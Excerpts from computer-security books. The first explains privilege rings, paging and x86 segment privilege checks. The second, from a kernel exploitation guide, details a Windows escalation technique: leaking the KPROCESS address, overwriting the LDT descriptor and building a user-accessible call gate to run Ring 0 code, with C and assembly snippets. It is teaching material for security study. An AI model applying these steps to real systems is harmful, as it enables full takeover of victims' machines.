Figure 12-2. Privilege rings (levels). The innermost ring is the highest privilege at which software can execute, normally used by the OS or hypervisor. The outermost ring is the lowest privilege, normally used by application software. The middle rings (if they exist) are architecture-specific and are often unused in practice.

By occupying the highest privilege ring, the kernel controls all compute resources. It can read and write any memory location, execute any instruction supported by the processor, receive all hardware events, and operate all peripherals. User applications, residing in the lowest privilege level, have limited access to memory (now enforced through virtual memory), cannot execute privileged instructions, and can only access peripherals by invoking OS services. A processor differentiates between kernel and user with bits in a special register, generically called the program status word and specifically called the Program Status Register in ARM architectures, the Hypervisor State Bit in PowerPC architectures, the Privileged Mode bit in the Processor State Register in SPARC architectures, or the Current Privilege Level in the Code Segment Register in Intel architectures.

A hierarchy of control from most to least privileged, combined with memory access controls, prevents user programs from performing any action outside a carefully sandboxed environment without invoking services (code) in a more privileged level. Control transfer between different privilege rings usually is done with interrupts or specialized control instructions; on more recent Intel architectures, the sysenter and sysexit instructions allow fast switching during system calls. The OS controls the data structures and policies that govern high-level security concepts like users and files, and code running outside the highest privileged ring cannot manipulate them directly. A critical aspect of securing high-level code and data is memory protection.

In simple architectures, the privileged state also defines memory separation. An example of a simple policy could be that user code can only access memory in a specified range such as 0xF000 to 0xFFFF, whereas privileged code can access the full memory range. With one or more fixed memory partitions, privileged code can manage both the allocation and separation of memory among application tasks. Except for embedded and highly customized applications, static memory partitioning is impractical.

A multiprocessing system comprising dynamic tasks, each with distinct (often statically unknown) memory and execution demands, requires dynamic memory management to limit memory fragmentation and balance resource utilization. Two practical solutions for dynamic memory management are to use fixed-size blocks (pages) or variable-length segments. With either solution, memory accesses must be translated to a physical address and verified for correct access rights. Modern architectures usually provide some support for translation and verification of memory accesses, whether for pages or segments.

Virtual memory with paging is the norm in dynamic memory management. Paging provides each application (process) with a linear contiguous virtual address space. The physical location of data referenced by such an address is computed based on a translation table that the OS maintains. The memory management unit (MMU) is a special hardware unit that helps to translate from virtual to physical addresses, with acceleration in the form of a hardware lookup table called the translation lookaside buffer (TLB), and helps in checking access permissions.

The OS maintains a page table for each virtual address space that contains entries of virtual-to-physical page mappings. Each page table entry contains a few protection bits, which are architecture-dependent: either one bit to distinguish between read/write permissions or two encoded bits (or three independent bits) for read/write/execute permissions. A process gains access to individual pages based on the permission bits. Because each process has a different page table, the OS can control how processes access memory by setting (clearing) permission bits or by not loading a mapping into the MMU. During a process context switch, however, the OS must flush (invalidate) the hardware that accelerates translation (the translation lookaside buffer or TLB). So, hardware supports paging with protection bits, which generate an exception on invalid accesses, and with the TLB for accelerating translations.

Although page-based virtual memory systems allow for process isolation and controlled sharing, the granularity of permission is coarse: permissions can only be assigned to full pages, typically 4 KB. An application that needs to isolate small chunks of memory must place each chunk in its own page, leading to excessive internal fragmentation.

With segmentation, instead of one contiguous virtual address space per process, we can have multiple variable-sized virtual spaces, each mapped, managed, and shared independently. Segmentation-based addressing is a two-step process involving application code and processor hardware: code loads a segment selector into a register and issues memory accesses; then, for each memory access, the processor uses the selector as an index into a segment table, obtains a segment descriptor, and computes the access relative to the base address present in the segment descriptor. Access to the segment descriptor is restricted to high-privilege code.

Consider the Intel architecture as an example of segmentation. It uses the code segment (CS) register as a segment selector and stores the current privilege level (CPL) as its two lower bits. When the executing code tries to access a data segment, the descriptor privilege level (DPL) is checked. Depending on whether the loaded segment is data, code, or a system call, the check ensures the CPL allows loading the segment descriptor based on the DPL. For example, a data segment DPL specifies the highest numeric CPL that a task may have and still be allowed access, so if DPL is 2 then access is granted only to tasks with CPL of 0, 1, or 2. A third privilege level, the requested privilege level (RPL), is used when invoking OS services through call gates and prevents less privileged applications from elevating privileges and gaining access to restricted system segments.
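That numeric comparison can be captured in a few lines. This sketch is a model of the data-segment rule, not processor microcode; it also folds in the RPL, treating the effective privilege as the weaker (numerically larger) of CPL and RPL:

```c
/* Privilege levels are 0 (most privileged) to 3 (least privileged).
   A data segment is accessible when the effective privilege level
   max(CPL, RPL) is numerically <= the descriptor's DPL. */
static int data_access_allowed(int cpl, int rpl, int dpl)
{
    int effective = cpl > rpl ? cpl : rpl;
    return effective <= dpl;
}
```

With DPL=2, tasks at CPL 0, 1, or 2 pass the check; a CPL-3 task, or any task presenting RPL=3, does not.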

Most open or commercial OSs ignore or make limited use of segmentation. OS/2 [55] is a modern commercial OS that uses the full features of segmentation. Some virtualization techniques (such as the VMware ESX hypervisor) do reserve a segment for a resident memory area and rely on segment limit checks to catch illegal accesses.


Windows

Enrico Perla, Massimiliano Oldani, in A Guide to Kernel Exploitation, 2011

Overwriting Kernel Control Structures

Function pointers are not the only good targets. We can overwrite any other kernel structure that modifies the user-land-to-kernel interface. One interesting way to deal with user-land-to-kernel interfaces (or gates) is to modify processor-related tables. As we saw in Chapter 3, if we can modify the IDT, GDT, or the LDT, we can introduce a new "kernel gate." This section will show how to automatically overwrite the LDT descriptor within the GDT table, redirecting the LDT table into user land. This approach has been chosen over the others (e.g., direct GDT/LDT modification) because in this scenario we are able to successfully exploit the arbitrary overwrite vulnerability by patching only one byte with partially controlled or uncontrolled data.

A similar technique has been used for ages by a few rootkits to locate system-wide open file descriptors and to stealthily open a kernel gate, avoiding having to load drivers on demand. As mentioned before, we can exploit a lot of different vectors, and the one shown next is just one among many we can choose from. For example, the direct LDT overwrite vector, described recently by Jurczyk M and Coldwind G,6 can also be used.

Leaking the KPROCESS Address

Windows has a lot of undocumented system calls that do nice things. We have met one of them before, while looking for a way to enumerate device drivers' base addresses: ZwQuerySystemInformation(). This function can also be used to enumerate the kernel address of the KPROCESS structure of the currently running process. The function that implements the KPROCESS search is named FindCurrentEPROCESS(). The full code, as usual, can be found on this book's companion Web site, www.attackingthecore.com.

This function first opens a new handle to the current process object using the OpenProcess() API. After having opened a valid handle, it invokes the ZwQuerySystemInformation() API using SystemHandleInformation as the SYSTEM_INFORMATION_CLASS parameter. This function retrieves all the open handles in the system. Every entry is composed of a SYSTEM_HANDLE_INFORMATION_ENTRY whose layout is shown below:

typedef struct _SYSTEM_HANDLE_INFORMATION_ENTRY

{

  ULONG ProcessId;

  BYTE ObjectTypeNumber;

  BYTE Flags;

  SHORT Handle;

  PVOID Object;

  ULONG GrantedAccess;

} SYSTEM_HANDLE_INFORMATION_ENTRY,

  *PSYSTEM_HANDLE_INFORMATION_ENTRY;

The Object field holds the linear address of the dynamically allocated kernel object related to the given handle stored in the Handle field. The function looks for an entry that has the ProcessId field equal to the current process ID and the Handle field equal to the just-opened process handle. The Object field of the located entry is thus the KPROCESS structure address of the current process.
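The lookup FindCurrentEPROCESS() performs over the returned entries can be sketched as a plain scan. The structure layout is the one shown above; the helper name and test values below are hypothetical:

```c
#include <stddef.h>

/* Stand-in for the Windows SYSTEM_HANDLE_INFORMATION_ENTRY layout
   shown in the text, using portable types for illustration. */
typedef struct {
    unsigned long  ProcessId;
    unsigned char  ObjectTypeNumber;
    unsigned char  Flags;
    unsigned short Handle;
    void          *Object;
    unsigned long  GrantedAccess;
} handle_entry;

/* Scan for the entry matching our PID and freshly opened handle,
   and return its kernel Object pointer (the KPROCESS address). */
static void *find_object(const handle_entry *e, size_t n,
                         unsigned long pid, unsigned short h)
{
    for (size_t i = 0; i < n; i++)
        if (e[i].ProcessId == pid && e[i].Handle == h)
            return e[i].Object;
    return NULL;
}
```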

Note

Since the KPROCESS is the first embedded field within the EPROCESS structure, the address of the KPROCESS structure is always equal to the address of the EPROCESS structure as well.

From this point onward we can overwrite an arbitrary element of the KPROCESS (and thus also the EPROCESS) structure. Let's take a look at a few interesting fields we can overwrite within the KPROCESS structure:

0: kd> dt nt!_kprocess 859b6ce0

  +0x000 Header   : _DISPATCHER_HEADER

  +0x010 ProfileListHead   : _LIST_ENTRY

  +0x018 DirectoryTableBase : [2] 0x3fafe3c0

  +0x020 LdtDescriptor   : _KGDTENTRY

  +0x028 Int21Descriptor   : _KIDTENTRY

  +0x030 IopmOffset   : 0x20ac

  +0x032 Iopl   : 0 ''

[ … ]

At the beginning of the KPROCESS structure there are a couple of very interesting entries: a KGDTENTRY structure (LdtDescriptor) and a KIDTENTRY (Int21Descriptor). The former structure represents the local process LDT segment descriptor entry. This special system segment entry is stored inside the global descriptor table (GDT) during every context switch and describes the location and size of the current local descriptor table (LDT) in memory. The latter entry represents the 21st interrupt descriptor table (IDT) entry, used mainly by the virtual DOS machine (NTVDM.exe) to emulate vm86 (virtual 8086 mode) processes. This entry is needed to emulate the original INT 21h software interrupt, which was used as an entry point to old DOS system service routines. By overwriting the former GDT entry (through the saved LDT segment descriptor) we can remap the whole LDT into user-land memory. After having gained full access to the LDT we can just build up an inter-privilege call gate to run Ring 0 code. Similarly, by overwriting the 21h IDT entry we can build a new trap gate that achieves the same result: running arbitrary code at Ring 0.

Next, we will briefly show how to exploit the former vector to build an arbitrary call gate, remapping the whole LDT into user-land memory. A call gate is a gate descriptor that can be stored within the LDT or the GDT. It provides a way to jump to a different segment located at a different privilege level.

The main function implementing this exploitation vector is called LDTDescOverwrite(). As usual, the highly commented full code is available inside the DVWDExploits package. First, it creates and initializes a new LDT using the undocumented ZwSetInformationProcess() API, which has the following prototype:

typedef enum _PROCESS_INFORMATION_CLASS

{

  ProcessLdtInformation = 10

} PROCESS_INFORMATION_CLASS;

NTSTATUS __stdcall

  ZwSetInformationProcess

  (HANDLE ProcessHandle,

  PROCESS_INFORMATION_CLASS ProcessInformationClass,

  PPROCESS_LDT_INFORMATION ProcessInformation,

  ULONG ProcessInformationLength);

The first parameter has to be a valid process handle (acquired via the OpenProcess() API). The second parameter is the process information class type: ProcessLdtInformation. The third parameter holds the pointer to a PROCESS_LDT_INFORMATION structure, and the fourth parameter is the size of that structure. The PROCESS_LDT_INFORMATION has the following layout:

typedef struct _PROCESS_LDT_INFORMATION

{

  ULONG Start;

  ULONG Length;

  LDT_ENTRY LdtEntries[…];

}   PROCESS_LDT_INFORMATION, *PPROCESS_LDT_INFORMATION;

The Start field indexes the first available descriptor within the LDT. The LdtEntries array holds an arbitrary number of LDT_ENTRY structures, and the Length is the size of the LdtEntries array. An LDT_ENTRY may identify a system segment (task-gate segment), a segment descriptor (data or code segment descriptor), or a call/task gate. Every LDT entry is 8 bytes wide on 32-bit architectures and 16 bytes wide on x64 architectures.

Note

It is important not to confuse an LDT segment descriptor (a special system segment that can be stored only within the GDT and that identifies the location of the LDT) with all the other segments/gates that can be stored in either the GDT or the LDT (except trap/interrupt gates, which can be stored only in the IDT).

Of course, as we can imagine, the ZwSetInformationProcess() API lets us create only a subset of all possible code and data segments, denying every attempt to create a system segment or gate descriptor. After invoking this call, the kernel allocates space for the LDT, initializes the LDT entries, and installs the LDT segment descriptor into the current processor GDT. Moreover, since every process can have its own LDT, the kernel saves the LDT segment descriptor into the LdtDescriptor field of the KPROCESS kernel structure, as described above. After a process context switch, the kernel checks whether the new process has a different active LDT segment descriptor and installs it in the current processor GDT before passing control back to the process. What we need to do can be summarized in the following steps:

Build an assembly wrapper around the payload to be able to return from the call gate (using a FAR RET).

This step can be accomplished by writing a small assembly stub that saves the current context, sets the correct kernel segment selector, invokes the actual payload, and returns to the caller, restoring the previous context and issuing a far return. The following is an example of code performing this on a 32-bit architecture:

0: kd> u 00407090 L9

00407090 60   pushad

00407091 0fa0   push   fs

00407093 66b83000   mov   ax,30h

00407097 8ee0   mov   fs,ax

00407099 b841414141   mov   eax,CShellcode

0040709e ffd0   call   eax

004070a0 0fa1   pop   fs

004070a2 61   popad

004070a3 cb   retf

The code saves all the general-purpose registers and the FS segment register. Next, it loads the new FS segment addressing the current KPCR (Kernel Processor Control Region) and invokes the kernel payload. At the end, before exiting, the code restores the FS segment selector and general-purpose registers and executes a far return to switch back to user land.

Build a fake user-land LDT at a page-aligned address.

This step is straightforward. We just have to map an anonymous writable page-aligned area in memory using the CreateFileMapping()/MapViewOfFile() API pair.

Fill the fake user-land LDT with a single call gate (entry 0) with the following characteristics:

The DPL must be 3 (accessible from user space)

The code segment selector must be the kernel code segment

The offset must be the address of our user-land payload

This step is carried out by the PrepareCallGate32() function, which is shown next:

VOID PrepareCallGate32(PCALL_GATE32 pGate, PVOID Payload)

{

  ULONG_PTR IPayload = (ULONG_PTR)Payload;

  RtlZeroMemory(pGate, sizeof(CALL_GATE32));

  pGate->Fields.OffsetHigh = (IPayload & 0xFFFF0000) >> 16;

  pGate->Fields.OffsetLow = (IPayload & 0x0000FFFF);

  pGate->Fields.Type = 12;

  pGate->Fields.Param = 0;

  pGate->Fields.Present = 1;

  pGate->Fields.SegmentSelector = 1 << 3;

  pGate->Fields.Dpl = 3;

}

The function takes two parameters: the pointer to the call gate descriptor (in our case, the first LDT_ENTRY of the fake user-land LDT) and a pointer to the payload. The Type field identifies the type of segment; the value 12 indicates a call gate descriptor. The Param field of the gate descriptor indicates the number of parameters that have to be copied to the callee stack when invoking the gate. We have to take this value into account since we need to restore the stack properly during the execution of the far return.

Locate the LDT descriptor by adding the correct offset to the address of the KPROCESS structure previously leaked by the FindCurrentEPROCESS() function.

Trigger the vulnerability to overwrite the LDT descriptor stored within the KPROCESS structure.

The LdtDescriptor field of the KPROCESS structure is located 0x20 bytes from the start of the structure. We need to overwrite the address (base) within the descriptor that locates the LDT in memory. Similar to what we did with the previous vector, we can overwrite the whole descriptor or just the MSB. If we overwrite just the MSB, we also have to create a lot of fake LDTs all over the target 16MB, at the start of every in-range page (much as we created the NOP sled before).

Force a process context switch.

Since the LDT segment descriptor is updated only after a context switch, we need to put the process to sleep or reschedule it before attempting to use the gate. It is enough to call an API that puts the process to sleep, like SleepEx(). At the next reschedule, the kernel will set up the modified version of the LDT segment descriptor, remapping the LDT into user land.

Trigger the call gate via a FAR CALL.

To step into the call gate we need to execute a FAR CALL instruction. Again, we can write a small assembly stub to do the job. The next snippet shows the code within the FarCall() function that performs the FAR CALL.

0: kd> u TestJump

[ … ]

004023be 9a000000000700 call 0007:00000000

[ … ]

As we can see, the code executes a CALL explicitly specifying a segment selector (0x07) and an offset (0x00000000) that is ignored during a call gate call but is mandatory for the assembly instruction format. As we saw in Chapter 3, a segment selector is built up of three elements. The two least significant bits are the requested privilege level (RPL), the next bit is the table indicator (TI) flag, and the remaining bits are the index of the descriptor inside the GDT/LDT. In this case the segment selector has an RPL equal to 3, a TI flag equal to 1, and a descriptor index equal to zero. As expected, this means that the selector is addressing the LDT (TI=1) and that we are interested in the already-set-up LDT_ENTRY (the first one), which has an index value of zero.
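The selector decomposition can be checked with a few lines of C (an illustrative helper, not exploit code):

```c
#include <stdint.h>

/* A segment selector packs three fields:
   bits 1:0 = RPL, bit 2 = TI (0 = GDT, 1 = LDT), bits 15:3 = index. */
static void split_selector(uint16_t sel, int *rpl, int *ti, int *index)
{
    *rpl   = sel & 3;
    *ti    = (sel >> 2) & 1;
    *index = sel >> 3;
}
```

For 0x07 this yields RPL=3, TI=1, index=0, matching the selector used in the FAR CALL above; the kernel code selector 0x08 decodes to RPL=0, TI=0, index=1.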
